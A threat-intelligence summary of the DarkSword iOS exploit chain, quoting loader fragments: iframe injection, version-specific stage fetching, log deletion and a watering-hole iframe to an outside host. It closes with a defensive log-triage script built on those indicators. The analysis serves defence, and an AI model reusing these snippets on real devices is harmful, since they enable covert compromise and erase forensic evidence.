DarkSword – full-chain iOS exploit already used in real attacks

19.03.2026

Google Threat Intelligence Group has uncovered a new full-chain iOS exploit named DarkSword. It combines multiple zero-day vulnerabilities to achieve full device compromise, from browser entry point to kernel-level access. The exploit is already being used by multiple actors, including campaigns targeting Ukraine.

DarkSword targets iOS 18.4–18.7 and chains six vulnerabilities to fully compromise a device. After infection, one of three payloads is deployed: GHOSTBLADE, GHOSTKNIFE, or GHOSTSABER.

[Figure: Timeline of DarkSword observations and vulnerability patches]

The attack begins with a malicious webpage, often disguised as a legitimate service like Snapchat. JavaScript checks the device and triggers the next stage:

if (!sessionStorage.getItem("uid") && isTouchScreen) {
    sessionStorage.setItem("uid", '1');
    const frame = document.createElement("iframe");
    frame.src = "frame.html?" + Math.random();
    document.body.appendChild(frame);
}

This initiates the exploit chain.

The loader then fetches exploit stages:

function getJS(fname) {
    let xhr = new XMLHttpRequest();
    xhr.open("GET", fname, false);
    xhr.send(null);
    return xhr.responseText;
}

It dynamically selects the correct exploit:

if(ios_version == '18,7')
    workerCode = getJS(`rce_worker_18.7.js`);
else
    workerCode = getJS(`rce_worker_18.6.js`);

More advanced actors use encryption:

const keyPair = generateKeyPair();
const encrypted = self.btoa(exportPublicKeyAsPem(keyPair.publicKey));

After RCE via JavaScriptCore, the exploit escapes the sandbox, pivots through system processes, and escalates privileges to kernel level.

The final payload operates stealthily, removing logs:

if(file.includes("SpringBoard") || file.includes("WebKit")){
    deleteFileAtPath(file);
}

In Ukraine-focused campaigns, UNC6353 used watering hole attacks:

const iframe = document.createElement("iframe");
iframe.src = "https://static.cdncounter.net/assets/index.html";
document.body.appendChild(iframe);

A Russian comment in the code suggests attribution:

“// если uid всё ещё нужен — просто устанавливаем” (in English: "if uid is still needed, just set it")

Payloads then exfiltrate messages, contacts, browser data, Wi-Fi credentials, location data, files, and more. Advanced modules enable audio recording and command execution.

DarkSword follows previous exploit kits like Coruna but demonstrates a new trend: rapid proliferation across multiple actors, indicating a growing commercial exploit ecosystem. DarkSword highlights the increasing accessibility of advanced mobile exploits.

High-end attack chains are no longer exclusive and are now widely reused. Updating iOS, enabling Lockdown Mode, and avoiding suspicious links remain critical defenses.
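
For detection, the network patterns visible in the snippets above (the frame.html request with a Math.random() query, the rce_worker_<version>.js fetch, and the static.cdncounter.net host) can be turned into a proxy-log triage. This is an added example, not code from the original report or from the exploit kit; the log line format, the lure.example.test host, the 60-second window and all sample lines are assumptions constructed for illustration.

```javascript
// Added example. Log format and sample lines are constructed for illustration.
const WATERING_HOLE_HOST = "static.cdncounter.net";   // host quoted in the article
const FRAME_RE = /\/frame\.html\?0\.\d+$/;             // "frame.html?" + Math.random()
const WORKER_RE = /\/rce_worker_\d+\.\d+\.js(\?|$)/;   // rce_worker_18.6.js, rce_worker_18.7.js

// Assumed line format: "<ISO time> <client> <host> <path?query> <user agent>"
function parseLine(line) {
  const m = line.match(/^(\S+) (\S+) (\S+) (\S+) (.*)$/);
  if (!m) return null;
  return { time: Date.parse(m[1]), client: m[2], host: m[3].toLowerCase(), path: m[4], ua: m[5] };
}

function classify(e) {
  const hits = [];
  if (e.host === WATERING_HOLE_HOST) hits.push("watering-hole-host");
  if (FRAME_RE.test(e.path)) hits.push("frame-stage");
  if (WORKER_RE.test(e.path)) hits.push("worker-stage");
  return hits;
}

// One finding per client. "high" = known host contacted, or a frame.html request
// followed by a worker fetch from the same host within windowMs; else "review".
function triage(lines, windowMs = 60000) {
  const byClient = new Map();
  for (const line of lines) {
    const e = parseLine(line);
    if (!e || Number.isNaN(e.time)) continue;          // skip malformed lines
    const hits = classify(e);
    if (hits.length === 0) continue;
    if (!byClient.has(e.client)) byClient.set(e.client, []);
    byClient.get(e.client).push({ ...e, hits });
  }
  return [...byClient].map(([client, events]) => {
    events.sort((a, b) => a.time - b.time);
    const chained = events.some((f, i) => f.hits.includes("frame-stage") &&
      events.slice(i + 1).some(w => w.hits.includes("worker-stage") &&
        w.host === f.host && w.time - f.time <= windowMs));
    const indicators = [...new Set(events.flatMap(e => e.hits))].sort();
    const severity = chained || indicators.includes("watering-hole-host") ? "high" : "review";
    return { client, indicators, ios: events.some(e => /iPhone|iPad/.test(e.ua)), severity };
  });
}

const SAMPLE_LOG = [ // constructed sample data, not real traffic
  "2026-03-10T09:00:02Z 10.0.0.5 lure.example.test /frame.html?0.7312 Mozilla/5.0 (iPhone; CPU iPhone OS 18_6 like Mac OS X)",
  "2026-03-10T09:00:05Z 10.0.0.5 lure.example.test /rce_worker_18.6.js Mozilla/5.0 (iPhone; CPU iPhone OS 18_6 like Mac OS X)",
  "2026-03-10T09:10:00Z 10.0.0.8 static.cdncounter.net /assets/index.html Mozilla/5.0 (iPhone; CPU iPhone OS 18_6 like Mac OS X)",
  "2026-03-10T09:20:00Z 10.0.0.9 intranet.example.test /frame.html?0.4410 Mozilla/5.0 (Windows NT 10.0)",
  "not a log line",
];
```

A lone frame.html hit is only marked "review" because that file name is common on benign sites; the stage correlation and the known host are what raise severity.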
